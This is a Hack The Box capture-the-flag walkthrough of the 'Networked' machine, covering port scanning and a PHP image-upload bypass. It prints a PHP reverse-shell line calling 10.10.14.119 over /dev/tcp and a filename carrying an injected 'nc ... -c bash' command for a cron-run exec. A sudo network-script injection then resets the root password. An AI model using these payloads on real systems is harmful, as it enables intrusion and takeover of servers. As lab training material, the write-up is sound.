Hack the box: Networked

Networked

Recon

Nmap scan shows basically only one surface of attack, the webserver:

# nmap 10.10.10.146 -sS -sV -O -n 
Starting Nmap 7.70 ( <https://nmap.org> ) at 2019-10-21 23:31 CEST
Nmap scan report for 10.10.10.146
Host is up (0.036s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
443/tcp closed https
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Crestron XPanel control system (89%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (89%), Linux 3.13 (89%), Linux 3.13 or 4.2 (89%), Linux 3.16 (89%), Linux 4.10 (89%), Linux 4.2 (89%)
No exact OS matches for host (test conditions non-ideal).OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds
# dirb <http://10.10.10.146> /usr/share/wordlists/dirb/common.txt
-- snip ------ Scanning URL: <http://10.10.10.146/> ----
==> DIRECTORY: <http://10.10.10.146/backup/>
+ <http://10.10.10.146/cgi-bin/> (CODE:403|SIZE:210)
+ <http://10.10.10.146/index.php> (CODE:200|SIZE:229)
==> DIRECTORY: <http://10.10.10.146/uploads/>

Foothold

It contains a backup archive with backend PHP scripts. As it turns out, the upload.php file relies on a weak file filter. First it check the file name with extension whitelist:

list ($foo,$ext) = getnameUpload($myFile["name"]);
$validext = array('.jpg', '.png', '.gif', '.jpeg');
$valid = false;
foreach ($validext as $vext) {
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
$valid = true;
}
}
function file_mime_type($file) {
$regexp = '/^([a-z\\-]+\\/[a-z0-9\\-\\.\\+]+)(;\\s.+)?$/';
if (function_exists('finfo_file')) {
$finfo = finfo_open(FILEINFO_MIME);
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
{
$mime = @finfo_file($finfo, $file['tmp_name']);
finfo_close($finfo);
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
$file_type = $matches[1];
return $file_type;
}
}
}
if (function_exists('mime_content_type'))
{
$file_type = @mime_content_type($file['tmp_name']);
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
{
return $file_type;
}
}
return $file['type'];
}function check_file_type($file) {
$mime_type = file_mime_type($file);
if (strpos($mime_type, 'image/') === 0) {
return true;
} else {
return false;
}
}
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.119/443 0>&1'"); ?>
89 50 4E 47 0D 0A 1A 0A
# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.119] from (UNKNOWN) [10.10.10.146] 42890
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
bash-4.2$

User

/home/guly folder contains an interesting crontab file that runs a simple php script. It’s supposed to check upload folder content and inform admin about any files with names that don’t match the name format. Fortunately for the attacker scripts author used a PHP exec function, where they concatenate the file name with rm command:

foreach ($files as $key => $value) {
-- snip -- exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
}
; nc 10.10.14.119 444 -c bash
# nc -nvlp 444
listening on [any] 444 ...
connect to [10.10.14.119] from (UNKNOWN) [10.10.10.146] 45808
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
cd /home/guly
cat user.txt
526***

Root

There is a certain custom script that can be run with root privleges without the password:

sh-4.2$ sudo -l
sudo -l
-- snip --User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoFregexp="^[a-zA-Z0-9_\\ /-]+$"for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
sh-4.2$ sudo /usr/local/sbin/changename.sh
sudo /usr/local/sbin/changename.sh
interface NAME:
a passwd
a passwd
interface PROXY_METHOD:
a
a
interface BROWSER_ONLY:
a
a
interface BOOTPROTO:
a
a
Changing password for user root.
New password: tellicotellicoRetype new password: tellicotellicopasswd: all authentication tokens updated successfully.
Changing password for user root.
New password: tellicotellicoRetype new password: tellicotellicopasswd: all authentication tokens updated successfully.
ERROR : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.
sh-4.2$ su 
su
Password: tellicotellico[root@networked guly]# cd /root
cd /root
[root@networked ~]# cat root.txt
cat root.txt
0a8...

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store